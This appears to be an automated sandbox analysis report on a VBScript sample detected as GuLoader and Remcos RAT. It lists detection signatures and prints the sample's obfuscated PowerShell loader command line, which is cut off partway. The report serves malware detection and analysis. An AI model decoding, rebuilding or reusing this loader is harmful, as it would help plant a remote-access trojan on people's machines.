Edit tour
Windows
Analysis Report
TAS_#U63a1#U8cfc#U8a02#U55ae.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Antivirus detection for URL or domain
Yara detected GuLoader
Maps a DLL or memory area into another process
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 7492 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\TAS_# U63a1#U8cf c#U8a02#U5 5ae.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7552 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " function E vent ([Str ing]$chanc ){$Nonanti ci = 8;For ($Flodblge rn=7; $Flo dblgern -l t $chanc.L ength-1; $ Flodblgern +=$Nonanti ci){$Ennuy ant201=$En nuyant201+ $chanc.Sub string($Fl odblgern, 1)};$Ennuy ant201;}$u nsp=Event 'Articleh Gimpedt Al ibietbirke nsp Devotg s Repres:S undhed/ Pr onit/ Bads tudpaagreb rSubduediS jlsrenvFam iliee Ideo gr.Beredel gPseudocoS rmrkenoUnd ervigDekom prlHystero eHndelse.E uphauscRef ormbokursg evmSommerf /KomparauO verfemcEuf emis?progr ameHoughsi xBalderspF alskmnoTri olerr Stif fetDemelem =Majlisada gamavioSki fflewOpstr ennNykbing lFaldgruoT ranerpaZyg omasdindel uk&Miniern iTranslidK aosset=Thr ummi1disco ph5 Chlamy zHjerneabB itange1Des ulfuCPiles trCKontras eIndurataW orseshi By gvkedQuant itrLysteli R OmkartAB etelpa3 Ar tistaadres seRRekvire nAktionsUP olyadeOGra vero3Chima riG enlace vLoopertuK seskaf8Ver muttBWrong do0Askefll r ReproabT roldkrjTte lsesS Mona diKEnforce a Teodol ' ;$Ennuyant 20101=Even t 'Illumin iSimarubeL ynchpixPre text ';$Un der= $Ennu yant20101; $Miljomr = Event 'Ta riffi\Nont ragsTilkal dyConcarns Tzimmesw S upermoAman uenwDartsp i6Supplem4 Cyrtome\An hemitWDisk retiDuette rn Mennesd GrftekaoMi scalcw Arp eggs Agers tPcoroneto PseudoawFr diggreCyto logrGgemme nSenterech DkfjereHj nelselSche mell Cowed l\Larvariv Rosett1Ar abesk.Saml egl0forlag s\Irreprop DedikaoUo verkowKabe ltoeBankbe tr Kontras CykelklhSa lgssueSlhu ndelHazeln ulAdelskr. ComporeKa rolaaxPerr idieRecept a '; . ($Ennu yant20101) (Event 'A calypt$vgt stngPRaadm ndrSystemu oSaaningc MelloweLnn ingsnIndgr ebtBetrykk u Slubbe2S ebkhas=Bjr nekl$Pjatt eheMadagas nSkrigeuvG alabiy:Suk redewInblo wiiAndenbe nForelbid DummysiOpg avetrUerke nd ') ; & ($En nuyant2010 1) (Event 'Sakerst$ SemipuMCoa tersiGagge rylLonglic jEtiskdjoA cerbicmTil stnir Irid es= Ubeskr $StrobilPS narligrVit alizocoxyf okcPisksam e ForcibnC ushiont Bj ergeuTrlsd eb2 Feltln +Amalies$s vkkelsMDom mesgiUdsly nglChastac jModernioD ifferemSer otinr Fore gg ') ; . ($Enn uyant20101 ) (Event ' Avenuer$Ap terinBDiff ererTabela diKostensd HovedsygSp ionkaeCont rolmNonrev oa Unrecks HelmeddtRe ntvis Meta nti=Strand s Calpacs( Citrone(Re kursbgAbse ncewKrympn im Nonrevi Overbet Pr ovokaw Vag arii Spdbr nn Uigenn3 Stridsm2He ptane_kaur yomp Brutt or Ankermo IndstrecRi veraieSude bohsOilfis hsDdbolde Silgree- T ietolF Say net Gitter P RkenerrP etioleoCar telicLdigt pae skalle sOverwagsU nperpeI Sh abrad Syns te=udsagns $Dgninst{T rappegPFab ulisIReele nsDBarberm }Omraade) Husalf.Wir estiCTonls luoDaniell mHalitusmK lagebeaAdv entsnadmis sidReststj LOptimisiS ennesbnSyn takseSnekk